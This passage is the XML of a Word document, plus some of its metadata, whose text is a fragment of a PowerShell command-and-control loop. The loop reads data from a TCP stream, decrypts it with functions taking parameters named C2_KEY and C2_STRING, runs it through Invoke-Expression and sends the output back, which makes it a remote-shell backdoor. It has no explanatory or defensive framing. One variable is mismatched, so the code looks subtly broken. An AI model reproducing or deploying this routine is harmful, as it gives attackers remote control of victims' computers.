      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6E5C1" w14:textId="3744BFCF" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">              $</w:t>
      </w:r>
      <w:r w:rsidR="00826F33">
        <w:t>OBJECT_READ_TO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[] 16384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17090A70" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E21EB0" w14:textId="231576D1" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                     $</w:t>
      </w:r>
      <w:r w:rsidR="002D3439">
        <w:t>MAX_RANGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F7196">
        <w:t>TCP_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t>.Read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="00826F33">
        <w:t>OBJECT_READ_TO</w:t>
      </w:r>
      <w:r>
        <w:t>, 0, 16384)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC02207" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                 } </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE62316" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DDCD3D6" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7B893" w14:textId="73F773BF" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                        $</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:r w:rsidR="00826F33">
        <w:t>OBJECT_READ_TO</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>5..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:r w:rsidR="002D3439">
        <w:t>MAX_RANGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - 1)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72308E61" w14:textId="7B7EAC6B" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                $</w:t>
      </w:r>
      <w:r w:rsidR="002D3439">
        <w:t>UTF8_ENCODED_STRING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>System.Text.Encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>UTF8.GetString((</w:t>
      </w:r>
      <w:r>
        <w:t>Func2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r>
        <w:t>VAR1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00D00A8B">
        <w:t>C2_STRING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD31B2B" w14:textId="3674FC20" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ($</w:t>
      </w:r>
      <w:r w:rsidR="002D3439">
        <w:t>UTF8_ENCODED_STRING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>Func1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @(109,112,97,124) -</w:t>
      </w:r>
      <w:r>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8)) { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r w:rsidR="00FE63CD">
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE63CD">
        <w:t>exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CC62B3E" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>try</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975D592" w14:textId="261B78B4" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                             $</w:t>
      </w:r>
      <w:r w:rsidR="000A0A37">
        <w:t>EXPRESSION_RESULT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:r w:rsidR="002D3439">
        <w:t>UTF8_ENCODED_STRING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2&gt;&amp;1) | Out-String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F192F" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                      } </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>catch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C5DD11" w14:textId="0AB1C4B5" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                   $</w:t>
      </w:r>
      <w:r w:rsidR="000A0A37">
        <w:t>EXPRESSION_RESULT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = (</w:t>
      </w:r>
      <w:r>
        <w:t>Func1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00553834">
        <w:t>ARRAY_TO_FUNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @(186,141,141,144,141) -</w:t>
      </w:r>
      <w:r>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 255)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BEA978" w14:textId="463A4681" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
      <w:r w:rsidR="00FE63CD">
        <w:t xml:space="preserve"> # Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7847B2" w14:textId="2EC1859B" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">          $</w:t>
      </w:r>
      <w:r w:rsidR="000A0A37">
        <w:t>TRIMED_STR</w:t>
      </w:r>
      <w:r w:rsidR="00B334ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidR="008D77B5">
        <w:t>Func3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00DA5718">
        <w:t>C2_COMMAND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A0A37">
        <w:t>EXPRESSION_RESULT</w:t>
      </w:r>
      <w:r>
        <w:t>.Trim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57634F1B" w14:textId="5162F5ED" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                       $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F7196">
        <w:t>TCP_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t>.Write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($BBBB8BB88BB888B8, 0, $BBBB8BB88BB888B8.Length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE97AD" w14:textId="77777777" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D8BA8" w14:textId="6DAD661F" w:rsidR="00BB5EBD" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">              $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F7196">
        <w:t>TCP_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t>.Close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430623E1" w14:textId="139D2BA2" w:rsidR="0060303A" w:rsidRDefault="00BB5EBD" w:rsidP="00BB5EBD">
      <w:r>
        <w:t xml:space="preserve">                $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F7196">
        <w:t>CLIENT</w:t>
      </w:r>
      <w:r>
        <w:t>.Close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0060303A" w:rsidSect="000623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EBD"/>
    <w:rsid w:val="00052D2E"/>
    <w:rsid w:val="000623C9"/>
    <w:rsid w:val="000A0A37"/>
    <w:rsid w:val="000F7196"/>
    <w:rsid w:val="001F4CE7"/>
    <w:rsid w:val="00216FFD"/>
    <w:rsid w:val="00233C43"/>
    <w:rsid w:val="002A18F3"/>
    <w:rsid w:val="002D3439"/>
    <w:rsid w:val="002D384F"/>
    <w:rsid w:val="002F04B6"/>
    <w:rsid w:val="003C62D2"/>
    <w:rsid w:val="0040016C"/>
    <w:rsid w:val="004671BC"/>
    <w:rsid w:val="00506198"/>
    <w:rsid w:val="00553834"/>
    <w:rsid w:val="00595DE7"/>
    <w:rsid w:val="005C3024"/>
    <w:rsid w:val="0060303A"/>
    <w:rsid w:val="008062AE"/>
    <w:rsid w:val="00826F33"/>
    <w:rsid w:val="00872E55"/>
    <w:rsid w:val="008D77B5"/>
    <w:rsid w:val="009765F1"/>
    <w:rsid w:val="00AE0A90"/>
    <w:rsid w:val="00B334ED"/>
    <w:rsid w:val="00B33C1B"/>
    <w:rsid w:val="00BB5EBD"/>
    <w:rsid w:val="00C30CAA"/>
    <w:rsid w:val="00C90807"/>
    <w:rsid w:val="00CE001B"/>
    <w:rsid w:val="00D00A8B"/>
    <w:rsid w:val="00DA5718"/>
    <w:rsid w:val="00F635F4"/>
    <w:rsid w:val="00FE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1CF4A2"/>
  <w14:defaultImageDpi w14:val="330"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{91A797E8-B3E7-49F0-A0ED-93D121AD0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B5E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B5E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B5EB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B5E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B5EB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B5E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B5E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B5E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B5E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5EB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5EB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5EB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B5EB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B5EB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B5EB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B5EB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B5EB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B5EB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B5E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5E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B5E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B5E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B5E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B5EB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B5EB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B5EB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B5EB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B5EB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B5EB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1024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Pawiel Hrusha</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Pawiel Hrusha</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-18T15:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-18T19:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>